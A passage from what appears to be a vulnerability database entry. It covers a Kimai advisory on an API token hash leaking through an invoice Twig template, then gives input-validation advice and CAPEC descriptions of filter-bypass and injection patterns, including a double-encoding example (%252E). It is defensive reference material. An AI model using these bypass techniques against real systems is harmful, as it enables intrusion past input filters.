"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Kimai leaks API Token Hash via Invoice Twig Template"
}
Mitigation
Strategy: Input Validation
Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.
CAPEC-120: Double Encoding
The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.
CAPEC-15: Command Delimiters
An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
CAPEC-182: Flash Injection
An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.
CAPEC-3: Using Leading 'Ghost' Character Sequences to Bypass Input Filters
Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading "ghost" characters (extra characters that don't affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary's input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.
CAPEC-43: Exploiting Multiple Input Interpretation Layers
An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
CAPEC-6: Argument Injection
An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
CAPEC-71: Using Unicode Encoding to Bypass Validation Logic
An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.
CAPEC-73: User-Controlled Filename
An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.
CAPEC-85: AJAX Footprinting
This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.